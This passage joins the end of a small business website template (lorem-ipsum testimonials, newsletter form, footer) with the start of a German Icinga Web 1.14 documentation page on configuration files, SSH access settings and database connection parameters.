<p><img src="images/open-quatation.jpg" class="open" alt="" />Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.<img src="images/close-quatation.jpg" class="closeq" alt="" /></p>
<h4><a href="#">Madam Elisabath, </a>Creative Director</h3>
</div>
<div class="clearfix"></div>
</div>
<div class="col-md-6 happy-clients-grid wow bounceIn" data-wow-delay="0.4s">
<div class="client">
<img src="images/client_3.jpg" alt="" />
</div>
<div class="client-info">
<p><img src="images/open-quatation.jpg" class="open" alt="" />Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make.<img src="images/close-quatation.jpg" class="closeq" alt="" /></p>
<h4><a href="#">Clips arter, </a>Lipsum directer</h3>
</div>
<div class="clearfix"></div>
</div>
<div class="col-md-6 happy-clients-grid span_66 wow bounceIn" data-wow-delay="0.4s">
<div class="client">
<img src="images/client_4.jpg" alt="" />
</div>
<div class="client-info">
<p><img src="images/open-quatation.jpg" class="open" alt="" />Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.<img src="images/close-quatation.jpg" class="closeq" alt="" /></p>
<h4><a href="#">zam cristafr, </a>manager</h3>
</div>
<div class="clearfix"></div>
</div>
<div class="clearfix"></div>
</div>
</div>
</div>
<div class="contact-section" id="contact">
<div class="container">
<div class="contact-section-head text-center wow fadeInLeft" data-wow-delay="0.4s">
<h3>newsletter</h3>
<p>Stay in the loop.</p>
</div>
<div class="form wow fadeInLeft" data-wow-delay="0.4s">
<form action="//seawaterfox.us10.list-manage.com/subscribe/post?u=984d3ee8dc5cd7123018f9293&id=7a9fe3fea3" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate>
<li>
<input type="text" class="text" value="First Name" name="FNAME" id="mce-FNAME" onfocus="this.value = '';" onblur="if (this.value == '') {this.value = 'First Name';}">
<a class="name"></a>
</li>
<li>
<input type="text" class="text" value="Last Name" name="LNAME" id="mce-LNAME" onfocus="this.value = '';" onblur="if (this.value == '') {this.value = 'Last Name';}">
<a class="name"></a>
</li>
<li>
<input type="email" class="text" value="Email Address" name="EMAIL" id="mce-EMAIL" onfocus="this.value = '';" onblur="if (this.value == '') {this.value = 'Email Address';}">
<a class="mail"></a>
</li>
<li style="position: absolute; left: -5000px;"><input type="text" name="b_984d3ee8dc5cd7123018f9293_7a9fe3fea3" tabindex="-1" value=""></li>
<input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe">
</form>
</div>
<div class="map">
<img src="images/map.jpg" alt="" />
<div class="location wow bounceIn" data-wow-delay="0.4s">
<div class="address text-center">
<h4>Location</h4>
<p>Niles, MI 49120</p>
<p>Phone: (574) 307-5336</p>
<a href="mailto://contact@seawaterfox.com">contact@seawaterfox.com</a>
<span class="locate"><img src="images/locate.png" alt="" /></span>
</div>
<div class="bottom-logo text-center">
<img src="images/logo.png" alt="" />
</div>
</div>
</div>
<div class="contact-bottom text-center">
<div class="bottom-menu wow bounceInRight" data-wow-delay="0.4s">
<ul>
<li><a class="scroll" href="#home">Home</a></li>
<li><a class="scroll" href="#service">Service</a></li>
<li><a class="scroll" href="#about">About us</a></li>
<li><a class="scroll" href="#pricing">Hourly Rates</a></li>
<li><a class="scroll" href="#work">How it works</a></li>
<li><a class="scroll" href="#clients">Happy Clients</a></li>
<li><a class="scroll" href="#contact">Contact Us</a></li>
</ul>
</div>
<p class="call wow fadeInRight" data-wow-delay="0.4s"><i class="phone wow fadeInLeft" data-wow-delay="0.4s"></i> (574) 307-5336</p>
<div class="social-icons">
<a class="wow bounceIn" data-wow-delay="0.4s" href="https://twitter.com/seawaterfox"><i class="twitter"></i></a>
<a class="wow bounceIn" data-wow-delay="0.4s" href="https://facebook.com/seawaterfox"><i class="facebook"></i></a>
<!-- Maybe later, but not right now.
<a class="wow bounceIn" data-wow-delay="0.4s" href="#"><i class="googlepluse"></i></a>
<a class="wow bounceIn" data-wow-delay="0.4s" href="#"><i class="linkedin"></i></a>-->
</div>
</div>
</div>
</div>
</div>
<div class="footer">
<div class="container">
<div class="copyright text-center wow bounceInLeft" data-wow-delay="0.4s">
<p>Copyright © 2015 <a href="https://www.seawaterfox.com">SeaWater Fox, LLC</a>. All rights reserved. | Site Design by <a href="http://www.w3layouts.com">w3layouts.com</a></p>
</div>
</div>
</div>
<script type="text/javascript">
$(document).ready(function() {
/*
var defaults = {
containerID: 'toTop', // fading element id
containerHoverID: 'toTopHover', // fading element hover id
scrollSpeed: 1200,
easingType: 'linear'
};
*/
$().UItoTop({ easingType: 'easeOutQuart' });
});
</script>
<a class="scroll" href="#home" id="toTop" style="display: block;"> <span id="toTopHover" style="opacity: 1;"> </span></a>
</body>
</html>
|
html/docs/de/icinga-web-config.html
|
Icinga/icinga-core
|
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>6.6. Konfigurationsübersicht Icinga Web</title>
<link rel="stylesheet" href="../stylesheets/icinga-docs.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.75.1">
<meta name="keywords" content="Supervision, Icinga, Nagios, Linux">
<link rel="home" href="index.html" title="Icinga Version 1.14 Dokumentation">
<link rel="up" href="ch06.html" title="Kapitel 6. Die Benutzeroberflächen">
<link rel="prev" href="icinga-web-scratch.html" title="6.5. Installation des Icinga Web Frontend">
<link rel="next" href="upgrading_icingaweb.html" title="6.7. Aktualisierung von Icinga Web und Icinga Web Datenbank">
<script src="../js/jquery-min.js" type="text/javascript"></script><script src="../js/icinga-docs.js" type="text/javascript"></script>
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<CENTER><IMG src="../images/logofullsize.png" border="0" alt="Icinga" title="Icinga"></CENTER>
<div class="navheader">
<table width="100%" summary="Navigation header">
<tr><th colspan="3" align="center">6.6. Konfigurationsübersicht Icinga Web</th></tr>
<tr>
<td width="20%" align="left">
<a accesskey="p" href="icinga-web-scratch.html">Zurück</a> </td>
<th width="60%" align="center">Kapitel 6. Die Benutzeroberflächen</th>
<td width="20%" align="right"> <a accesskey="n" href="upgrading_icingaweb.html">Weiter</a>
</td>
</tr>
</table>
<hr>
</div>
<div class="section" title="6.6. Konfigurationsübersicht Icinga Web">
<div class="titlepage"><div><div><h2 class="title" style="clear: both">
<a name="icinga-web-config"></a>6.6. Konfigurationsübersicht Icinga Web</h2></div></div></div>
<div class="toc"><dl>
<dt><span class="section">6.6.1. <a href="icinga-web-config.html#configfilelocation">Wo sind meine Konfigurationsdateien?</a></span></dt>
<dt><span class="section">6.6.2. <a href="icinga-web-config.html#configfileindex">Index</a></span></dt>
<dt><span class="section">6.6.3. <a href="icinga-web-config.html#globalconfig">Globale Konfiguration</a></span></dt>
<dt><span class="section">6.6.4. <a href="icinga-web-config.html#troubleshooting">Fehlersuche</a></span></dt>
<dt><span class="section">6.6.5. <a href="icinga-web-config.html#moduleconfig">Modul-Konfiguration:</a></span></dt>
<dt><span class="section">6.6.6. <a href="icinga-web-config.html#customconfig">Benutzerdefinierte Konfiguration</a></span></dt>
</dl></div>
<div class="section" title="6.6.1. Wo sind meine Konfigurationsdateien?">
<div class="titlepage"><div><div><h3 class="title">
<a name="configfilelocation"></a>6.6.1. Wo sind meine Konfigurationsdateien?</h3></div></div></div>
<p>Die von Icinga Web bereitgestellten Konfigurationsdateien stehen unter <code class="filename">app/config</code>, aber Site-spezifische
stehen im Web-Konfigurationsordner (per Default <code class="filename">etc/conf.d</code>), der bei Aktualisierungen nicht überschrieben wird. Der
Ordner kann während der Installation mit Hilfe von --with-conf-dir geändert werden. Die Namen der Dateien sind identisch zu denen in
<code class="filename">app/config</code>.</p>
<p>Icinga Web arbeitet mit Modulen und jedes Modul hat seine eigene Konfiguration. Das gilt ebenfalls für die Libraries. Wenn Sie
weitere Informationen zu den Cronk-Libraries benötigen, schauen Sie in <code class="filename">app/modules/Cronks/lib</code> (für js in
<code class="filename">app/modules/Cronks/lib/js</code>).</p>
<p>Ein Modul von Icinga Web ist wie folgt aufgebaut:</p>
<pre class="programlisting"> tree -d -L 1 app/modules/AppKit/
app/modules/AppKit/
|-- actions
|-- config
|-- lib
|-- models
|-- templates
|-- validate
|-- views</pre>
</div>
<div class="section" title="6.6.2. Index">
<div class="titlepage"><div><div><h3 class="title">
<a name="configfileindex"></a>6.6.2. Index</h3></div></div></div>
<table border="1" id="idm139734667609280">
<caption>Tabelle 6.1. Konfigurationsdateien</caption>
<tr>
<td><span class="bold"><strong>Dateiname</strong></span></td>
<td><span class="bold"><strong>Ablageort</strong></span></td>
<td><span class="bold"><strong>Bemerkung</strong></span></td>
</tr>
<tr>
<td><a class="link" href="icinga-web-config.html#configweb-access">access.xml</a></td>
<td>app/modules/Api/config/</td>
<td>Controls commands and where Icinga commands goes to</td>
</tr>
<tr>
<td><a class="link" href="icinga-web-config.html#configweb-auth">auth.xml</a></td>
<td>app/modules/AppKit/config/</td>
<td>Authentication configuration</td>
</tr>
<tr>
<td>cronks.xml</td>
<td>app/modules/Cronks/config/</td>
<td>System cronk and categories which are not changeable by users</td>
</tr>
<tr>
<td><a class="link" href="icinga-web-config.html#configweb-databases">databases.xml</a></td>
<td>app/config/</td>
<td>Upgrade safe database connections</td>
</tr>
<tr>
<td><a class="link" href="icinga-web-config.html#configweb-factories">factories.xml</a></td>
<td>app/config/</td>
<td>Agavi system config, storage and session configuration</td>
</tr>
<tr>
<td>icinga.xml</td>
<td>app/config/</td>
<td>Icinga settings, e.g. version and prefixes / version name</td>
</tr>
<tr>
<td><a class="link" href="icinga-web-config.html#configweb-logging">logging.xml</a></td>
<td>app/config/</td>
<td>Disable log levels or write new logfiles</td>
</tr>
<tr>
<td>module_appkit.xml</td>
<td>app/modules/AppKit/config/</td>
<td>Overwrite settings for AppKit module (ajax timeout, SQL query logging)</td>
</tr>
<tr>
<td>module_cronks.xml</td>
<td>app/modules/Cronks/config/</td>
<td>Overwrite settings for Cronks module</td>
</tr>
<tr>
<td>module_reporting.xml</td>
<td>app/modules/Reporting/config/</td>
<td>Overwrite settings for Reporting (multiple JasperServer ...)</td>
</tr>
<tr>
<td>module_web.xml</td>
<td>app/modules/Web/config/</td>
<td>Overwrite setting for Web module</td>
</tr>
<tr>
<td><a class="link" href="icinga-web-config.html#configweb-settings">settings.xml</a></td>
<td>app/config/</td>
<td>Change agavi core settings (Title, availability, debug-mode, ...)</td>
</tr>
<tr>
<td>sla.xml</td>
<td>app/modules/Api/config/</td>
<td>SLA settings for the provider (Only used by tackle view)</td>
</tr>
<tr>
<td>exclude_customvars.xml</td>
<td>app/modules/Api/config/</td>
<td>Exclude sensitive customvars from API queries</td>
</tr>
<tr>
<td>translation.xml</td>
<td>app/config/</td>
<td>Default language, date and time formats and settings</td>
</tr>
<tr>
<td>module.xml</td>
<td>app/modules/Appkit/config/</td>
<td>Overwrite user preferences using userpreferences.xml (in etc/conf.d)</td>
</tr>
</table>
<div class="itemizedlist"><ul class="itemizedlist" type="disc">
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#globalconfig" title="6.6.3. Globale Konfiguration">Globale Konfiguration</a></p>
<div class="itemizedlist"><ul class="itemizedlist" type="circle">
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-access">access.xml</a></p>
</li>
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-databases">databases.xml</a></p>
</li>
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-factories">factories.xml</a></p>
<div class="itemizedlist"><ul class="itemizedlist" type="square"><li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-session-lifetime">Session Cookie Lifetime</a></p>
</li></ul></div>
</li>
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-logging">logging.xml</a></p>
</li>
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-settings">settings.xml</a></p>
</li>
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-translation">translation.xml</a></p>
</li>
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-views">views.xml</a></p>
</li>
</ul></div>
</li>
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-timezone">Default-Zeitzone ändern</a></p>
</li>
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-userprefs">Benutzervorgaben ändern</a></p>
</li>
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-module">Module-Konfiguration</a></p>
</li>
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#configweb-auth">Authentifizierung</a></p>
</li>
<li class="listitem">
<p><a class="link" href="icinga-web-config.html#customconfig" title="6.6.6. Benutzerdefinierte Konfiguration">Benutzerdefinierte Konfiguration</a></p>
</li>
</ul></div>
</div>
<div class="section" title="6.6.3. Globale Konfiguration">
<div class="titlepage"><div><div><h3 class="title">
<a name="globalconfig"></a>6.6.3. Globale Konfiguration</h3></div></div></div>
<p><span class="bold"><strong>app/config</strong></span></p>
<p>Hier finden Sie die globalen Konfigurationsdateien für z.B. die Web-Session, den Icinga-Web-Pfad und die
Datenbankinformationen.</p>
<p>Die wichtigsten Dateien:</p>
<div class="itemizedlist"><ul class="itemizedlist" type="disc">
<li class="listitem">
<p><a name="configweb-access"></a>access.xml</p>
<p>Die Konfigurationsdatei <code class="filename">access.xml</code> hat zwei Hauptzwecke:</p>
<div class="itemizedlist"><ul class="itemizedlist" type="circle">
<li class="listitem">
<p>definieren von Hosts, auf die von Icinga-Web (via System oder ssh) zugegriffen werden kann und definieren von Dateien,
auf die lesend/schreibend zugegriffen werden kann bzw. auszuführenden Programmen</p>
</li>
<li class="listitem">
<p>zuordnen von Icinga-Instanzen zu diesen Hosts</p>
</li>
</ul></div>
<p>Die <code class="filename">access.xml</code>-Konfiguration wird von Icinga-Webs Console-Handler-Implementation genutzt und
bietet zusätzliche Sicherheit, weil sie willkürliche Ausführung/Manipulation von Dateien in letzter Instanz verhindert.</p>
<p><span class="bold"><strong>Abschnitte</strong></span></p>
<div class="itemizedlist"><ul class="itemizedlist" type="circle">
<li class="listitem">
<p><span class="emphasis"><em>Instanzen</em></span></p>
<p>Das Einrichten von Instanzen erfolgt im <instances>-Abschnitt:</p>
<p>Beispiel: Zuordnen der Instanz 'default' zum Host 'localhost' </p>
<pre class="screen"><!-- Map your instances to hosts here -->
<instances>
<instance name="default">localhost</instance>
</instances></pre>
<p>Zulässige Unterelemente</p>
<div class="itemizedlist"><ul class="itemizedlist" type="square"><li class="listitem">
<p>instance: Nur "instance" ist als Unterelement zulässig. Dieser Knoten ordnet einem Host (s.u.) einen Instanznamen zu,
der durch den Wert des Attributs "name" festgelegt ist: </p>
<pre class="screen"> <instance name="%icinga instance name%">%host name%</instance></pre>
</li></ul></div>
</li>
<li class="listitem">
<p><span class="emphasis"><em>Standardwerte</em></span></p>
<p>Der "default"-Abschnitt definiert Standardwerte für Host-Einstellungen, z.B. auf welche Dateien schreibend/lesend
zugegriffen werden bzw. welche ausgeführt werden können. Auch der Standard-Host, der von Icinga-Web benutzt werden soll, wird
hier definiert.</p>
<p>Zulässige Unterelemente</p>
<div class="itemizedlist"><ul class="itemizedlist" type="square">
<li class="listitem">
<p>defaultHost: definiert den Host, der für Aktionen benutzt wird, wenn kein Host angegeben ist. Dies nur für einige
Module wichtig und es betrifft nicht Icinga-Webs Standardleistungsumfang. </p>
<pre class="screen"> <defaultHost>localhost</defaultHost></pre>
<p>Der
Host muss im hosts-Abschnitt definiert werden.</p>
</li>
<li class="listitem">
<p>access: Icinga-Web (und Module, wenn sie korrekt geschrieben sind) greifen nicht direkt auf System-Ressourcen zu,
sondern über ein Console-Interface, das sich um die Sicherheit kümmert. Im Zugriffsabschnitt definieren Sie, welche
System-Ressources von dieser Behandlungsroutine aufgerufen werden dürfen und wo sie sich befinden. Außerdem geben Sie
System-Ressourcen einen Ressourcen-Namen. Der Console-Handler bspw. greift auf die Icinga-Pipe nur über den Ressource-Namen
"icinga_pipe" zu.</p>
<p>Der Zugriffsabschnitt hat vier zulässige Unterelemente: 'readwrite', 'read', 'write' und 'execute', die die
Zugriffsebene für darunterliegende Ressourcen definieren. Ressourcen selbst werden unter den Tags 'folders' oder 'files'
definiert und mit 'resource' eingeschlossen: Das folgende Beispiel erlaubt Schreib-/Lesezugriff auf Icingas
<code class="filename">objects</code>-Ordner. Schreiben, Lesen und Ausführen funktionieren analog, das 'readwrite'-Tag wird jeweils
durch das entsprechende Tag ausgetauscht.</p>
</li>
</ul></div>
<pre class="screen"> <readwrite>
<folders>
<resource name="icinga_objects">/usr/local/icinga/etc/objects</resource>
</folders>
<files>
<resource name="icinga_cfg">/usr/local/icinga/etc/icinga.cfg</resource>
</files>
</readwrite></pre>
<p>Wie oben erwähnt ordnet jede Ressource ein Ressourcen-Symbol (Name) einem Pfad zu. Dies ist optional, wird aber
empfohlen. Wenn ein Symbol mehrfach existiert, dann wird das letzte benutzt.</p>
<div class="note" title="Anmerkung" style="margin-left: 0.5in; margin-right: 0.5in;"><table border="0" summary="Note">
<tr>
<td rowspan="2" align="center" valign="top" width="25"><img alt="[Anmerkung]" src="../images/note.png"></td>
<th align="left">Anmerkung</th>
</tr>
<tr><td align="left" valign="top">
<p><span class="emphasis"><em>Eigene Default-Definitionen in Ihrem Konfigurationsordner</em></span></p>
<p>If you override a custom section, like readwrite, all previously set definitions will be ignored and must be redefined
if you want to use them. Das betrifft nicht Modul-KonfigurationenThis doesn't affect module configurations.</p>
</td></tr>
</table></div>
</li>
<li class="listitem">
<p><span class="emphasis"><em>Hosts</em></span></p>
<p>Im host-Abschnitt werden Zugriffsmethoden und Anmeldeinformation, aber auch spezifische Rechte für Hosts definiert.</p>
<p>Zulässige Unterelemente:</p>
<div class="itemizedlist"><ul class="itemizedlist" type="square">
<li class="listitem">
<p>host: definiert einen einzelnen Host und gibt ihm einen Namen, der benutzt werden kann, um auf diesen Host zu
referenzieren (wie z.B. im "instance"-Abschnitt). </p>
<pre class="screen"> <!-- Example for ssh connection with user/password auth -->
<host name="vm_host1">
<type>ssh</type>
<ssh-config>
<host>localhost</host>
<port>22</port>
<auth>
<type>password</type>
<user>john_doe</user>
<password>foobar</password>
</auth>
</ssh-config>
<access useDefaults="true" />
</host></pre>
<p> Das 'host'-Tag hat eine Reihe von Unterelementen:</p>
</li>
<li class="listitem">
<p>type: Entweder "local" oder "ssh". Definiert, ob Befehl direkt auf der Maschine ausgeführt werden, auf der Icinga-Web
läuft, oder via ssh.</p>
</li>
<li class="listitem">
<p>access: sh. den "access"-Abschnitt weiter oben. Zusätzlich kann 'useDefaults' gesetzt werden, um dem Command-Interface
mitzuteilen, dass alle Standardzugriffsdefinitionen benutzt werden sollen (wenn sie nicht in diesem Abschnitt überschrieben
werden).</p>
</li>
<li class="listitem">
<p>ssh-config: (nur falls type:ssh) Dies legt fest, wie auf den Host per ssh zugegriffen werden soll. Es gibt drei
Authentifizierungsmethoden für ssh: 'none', 'password' oder 'key', die im folgenden Abschnitt erläutert werden. Unabhängig
davon, welche Methode Sie wählen, müssen die 'host'- und 'port'-Einträge für jeden Host gesetzt werden.</p>
</li>
</ul></div>
</li>
<li class="listitem">
<p><span class="emphasis"><em>SSH-Config auth</em></span></p>
<p>Dieser Abschnitt erklärt den Authentifizierungsblock der ssh-Konfigurationseinstellungen, die wir im vorigen Anschnitt
angesprochen haben. Die Elemente unterhalb des 'auth'-Tags sind abhängig vom ausgewählten Authentifizierungstyp.</p>
<div class="itemizedlist"><ul class="itemizedlist" type="square">
<li class="listitem">
<p>Auth type: none</p>
<p>Dies teilt der Console-Verbindung mit, dass nur ein Benutzername für die Authentifizierung verwendet wird:</p>
<pre class="screen"> <ssh-config>
<host>localhost</host>
<port>22</port>
<auth>
<type>none</type>
<user>john_doe</user>
</auth>
</ssh-config></pre>
<p>In diesem Beispiel wird nur der Benutzername 'john_doe' für die Authentifizierung geliefert. Dies kann sinnvoll
sein, wenn Ihre Maschinen automatische Schlüssel-Authentifizierung benutzen.</p>
</li>
<li class="listitem">
<p>Auth type: password</p>
<p>Dies teilt der Console-Verbindung mit, dass Benutzername und Passwort für die Authentifizierung verwendet
werden:</p>
<pre class="screen"> <ssh-config>
<host>localhost</host>
<port>22</port>
<auth>
<type>password</type>
<user>john_doe</user>
<password>foobar</password>
</auth>
</ssh-config></pre>
<p>In diesem Beispiel werden nur der Benutzername 'john_doe' und das Passwort 'foobar' für die Authentifizierung
verwendet.</p>
</li>
<li class="listitem">
<p>Auth type: key</p>
<div class="important" title="Wichtig" style="margin-left: 0.5in; margin-right: 0.5in;"><table border="0" summary="Important">
<tr>
<td rowspan="2" align="center" valign="top" width="25"><img alt="[Wichtig]" src="../images/important.png"></td>
<th align="left">Wichtig</th>
</tr>
<tr><td align="left" valign="top">
<p>Experimentell! Probieren Sie es aus und öffnen Sie ein Ticket, wenn Sie Probleme haben!</p>
</td></tr>
</table></div>
<p>Dies teilt der Console-Verbindung mit, eine Schlüsseldatei für die Authentifizierung zu benutzen, die optional mit
einem Password geschützt ist</p>
<pre class="screen"> <ssh-config>
<host>localhost</host>
<port>22</port>
<auth>
<type>key</type>
<user>testuser</user>
<private-key>/usr/local/icinga-web/app/modules/Api/lib/.ssh/host1_rsa</private-key>
<password>secret123</password>
</auth>
</ssh-config></pre>
<p> Hier wird der private Schlüssel benutzt, der im 'private-key'-Tag definiert wird. Sie sollten und müssen
diesen Pfad <span class="emphasis"><em>nicht</em></span> im host-Zugriffsabschnitt definieren!</p>
</li>
</ul></div>
</li>
</ul></div>
</li>
<li class="listitem">
<p><a name="configweb-databases"></a><code class="filename">databases.xml</code> - enthält die Verbindungseinstellungen für Ihre
Icinga Web-Datenbank</p>
<div class="itemizedlist"><ul class="itemizedlist" type="circle">
<li class="listitem">
<p><a name="configweb-general"></a> <span class="emphasis"><em>Allgemeine Einstellungen</em></span></p>
<p>Die folgenden Einstellungen gelten für jede in Icinga Web definierte Datenbank.</p>
<p>Wenn Sie sich die Standarddefinition der icinga_web-Datenbank ansehen, dann finden Sie dort die meisten Einstellungen
einer generischen Datenbankverbindung:</p>
<pre class="screen"><db:database name="icinga_web" class="AppKitDoctrineDatabase">
<ae:parameter name="dsn">mysql://icinga_web:icinga_web@localhost:3306/icinga_web</ae:parameter>
<ae:parameter name="charset">utf8</ae:parameter>
<ae:parameter name="manager_attributes">
<ae:parameter name="Doctrine_Core::ATTR_MODEL_LOADING">CONSERVATIVE</ae:parameter>
</ae:parameter>
<ae:parameter name="load_models">%core.module_dir%/AppKit/lib/database/models/generated</ae:parameter>
<ae:parameter name="models_directory">%core.module_dir%/AppKit/lib/database/models</ae:parameter>
<ae:parameter name="date_format"><![CDATA[YYYY-MM-DD HH24:MI:SS]]></ae:parameter>
<ae:parameter name="caching">
<ae:parameter name="enabled">false</ae:parameter>
<ae:parameter name="driver">apc</ae:parameter>
<ae:parameter name="use_query_cache">true</ae:parameter>
<ae:parameter name="use_result_cache">true</ae:parameter>
<ae:parameter name="result_cache_lifespan">60</ae:parameter>
</ae:parameter>
</db:database></pre>
<div class="itemizedlist"><ul class="itemizedlist" type="square">
<li class="listitem">
<p>Datenbank-Identifier</p>
<pre class="screen"><db:database name="%Database name%" class="%Handler%">
...
</db:database></pre>
<p>Mit dem db:database-Tag informieren Sie Icinga Web, dass es sich um eine Datenbankdefinition handelt. Dieses Tag muss
zwei Attribute haben:</p>
<div class="itemizedlist"><ul class="itemizedlist" type="disc">
<li class="listitem">
<p>name: Der Name für Ihre Datenbank. Zu dieser Zeit (>= v1.5) ist 'icinga-web' für die interne
Icinga-Web-Datenbank reserviert, die Benutzer- und Anmeldeinformationen, Persistenz-Einstellungen usw. enthält, und
'icinga' für die Datenbank, die von ido2db genutzt wird, um die Informationen von Icinga zu speichern.</p>
</li>
<li class="listitem">
<p>class: Benutzen Sie immer "AppKitDoctrineDatabase", nur die 'icinga'-Datenbank erfordert 'IcingaDoctrineDatabase'
(siehe unten)</p>
</li>
</ul></div>
</li>
<li class="listitem">
<p>dsn (Data Source Name):</p>
<p>Definiert die Anmeldeinformationen, den Typ und Standort der Datenbank:</p>
<p>Für MySQL, PostgreSQL und Oracle:</p>
<pre class="screen"><db:database ...>
...
<ae:parameter name="dsn">%driver%://%username%:%password%@%host%:%port%/%database name%</ae:parameter>
...
</db:database></pre>
<p>Für sqlite3:</p>
<pre class="screen"><db:database ...>
...
<ae:parameter name="dsn">sqlite:///%path to your db file%</ae:parameter>
...
</db:database></pre>
<div class="note" title="Anmerkung" style="margin-left: 0.5in; margin-right: 0.5in;"><table border="0" summary="Note">
<tr>
<td rowspan="2" align="center" valign="top" width="25"><img alt="[Anmerkung]" src="../images/note.png"></td>
<th align="left">Anmerkung</th>
</tr>
<tr><td align="left" valign="top">
<p>SQLite-Datenbanken müssen für den Webserver-Benutzern les- und beschreibbar sein, außerdem das Verzeichnis, in dem
sich die Datei befindet.</p>
</td></tr>
</table></div>
<div class="itemizedlist"><ul class="itemizedlist" type="disc">
<li class="listitem">
<p>%driver%: Das zu benutzende Datenbank-Backend</p>
<div class="itemizedlist"><ul class="itemizedlist" type="circle">
<li class="listitem">
<p>mysql: Eine MySQL-Datenbank</p>
</li>
<li class="listitem">
<p>pgsql: Eine PostgreSQL-Datenbank</p>
</li>
<li class="listitem">
<p>oracle: Eine Oracle-Datenbank, auf die über den <a class="link" href="http://www.php.net/manual/de/book.oci8.php" target="_top">oci8</a>-Treiber zugegriffen wird</p>
<p>Benutzen Sie nicht den PDO-Treiber, denn dieser ist weit von produktiver Nutzung entfernt.</p>
</li>
<li class="listitem">
<p>icingaOracle: Eine spezielle Implementation, die genutzt werden muss, wenn eine Icinga-Datenbank verwendet
wird (einige Tabellennamen sind unterschiedlich und die Längen von Bezeichnern muss automatisch berücksichtigt
werden, um sicherzustellen, dass sich kein Entwickler während der Entwicklung umbringt).</p>
</li>
</ul></div>
</li>
<li class="listitem">
<p>%username%: Der Benutzername zur DB-Authentifizierung</p>
</li>
<li class="listitem">
<p>%password%: Das Passwort zur DB-Authentifizierung</p>
</li>
<li class="listitem">
<p>%host%: Der Host Ihres DB-Servers</p>
</li>
<li class="listitem">
<p>%port%: Der Port Ihres DB-Servers</p>
<div class="itemizedlist"><ul class="itemizedlist" type="circle">
<li class="listitem">
<p>mysql-default: 3306</p>
</li>
<li class="listitem">
<p>postgresql-default: 5432</p>
</li>
<li class="listitem">
<p>oracle-default: 1521</p>
</li>
</ul></div>
</li>
<li class="listitem">
<p>%database name%: Der Name Ihrer Datenbank</p>
</li>
</ul></div>
</li>
<li class="listitem">
<p>charset</p>
<pre class="screen"><db:database ...>
...
<ae:parameter name="charset">utf8</ae:parameter>
...
</db:database></pre>
<p>Im Allgemeinen sollte Ihr Datenbank-Zeichensatz utf8 sein.</p>
</li>
<li class="listitem">
<p>manager_attributes, load_models, models_directory</p>
<pre class="screen"><db:database ...>
...
<ae:parameter name="manager_attributes">
<ae:parameter name="Doctrine_Core::ATTR_MODEL_LOADING">CONSERVATIVE</ae:parameter>
</ae:parameter>
...
</db:database></pre>
<p>Sie können beruhigt diesen Abschnitt ignorieren und ihn einfach kopieren. Er enthält lediglich Doctrine-spezifische
Einstellungen (insbesondere wie Datenbankmodelle geladen werden und wo sie zu finden sind. Wenn Sie mehr wissen möchten,
dann schauen Sie in die <a class="link" href="http://www.doctrine-project.org/projects/orm/1.2/docs/manual/introduction-to-models/en#autoloading-models" target="_top">doctrine
documentation</a>).</p>
</li>
<li class="listitem">
<p>date_formate</p>
<p>Dies ist erforderlich, um sauber auf Oracle-Datenbanken zuzugreifen. Es setzt das für die Datenbank zu benutzende
Datumsformat.</p>
<pre class="screen"><db:database ...>
...
<ae:parameter name="date_format"><![CDATA[YYYY-MM-DD HH24:MI:SS]]></ae:parameter>
...
</db:database></pre>
</li>
<li class="listitem">
<p>Caching</p>
<pre class="screen"><db:database ...>
...
<ae:parameter name="caching">
<ae:parameter name="enabled">false</ae:parameter>
<ae:parameter name="driver">apc</ae:parameter>
<ae:parameter name="use_query_cache">true</ae:parameter>
<ae:parameter name="use_result_cache">true</ae:parameter>
<ae:parameter name="result_cache_lifespan">60</ae:parameter>
</ae:parameter>
<db:database></pre>
<p>Wenn Sie apc oder memcache benutzen, dann können Sie entweder Datenbankabfragen oder -ergebnisse zwischenspeichern.
Während das Zwischenspeichern von Abfragen eigentlich nie eine schlechte Sache ist (solange Sie nicht entwickeln), ist das
Zwischenspeichern von Ergebnissen ein ziemlich spezieller Fall - denn Sie könnten veraltete Daten aus Ihrer Datenbank
bekommen. <span class="bold"><strong>Also benutzen Sie es bitte nie für Ihre Icinga-Datenbank!</strong></span> </p>
<div class="itemizedlist"><ul class="itemizedlist" type="disc">
<li class="listitem">
<p>enabled: Caching für diese Datenbank ein- oder ausschalten</p>
</li>
<li class="listitem">
<p>driver: apc oder memcache, wobei memcache experimentell ist (also probieren Sie es aus !)</p>
</li>
<li class="listitem">
<p>use_query_cache: Abfragen zwischenspeichern (nur die SQL-Abfragen, nicht die Ergebnisse)</p>
</li>
<li class="listitem">
<p>use_result_cache: Datenbankergebnisse zwischenspeichern (<span class="bold"><strong>Gefahr!</strong></span>)</p>
</li>
<li class="listitem">
<p>result_cache_lifespan: Wie lange Ergebnisse zwischengespeichert werden sollen (in Sekunden), wenn
use_result_cache benutzt wird</p>
</li>
</ul></div>
</li>
</ul></div>
</li>
<li class="listitem">
<p><span class="emphasis"><em>Die "icinga_web"-Datenbank</em></span></p>
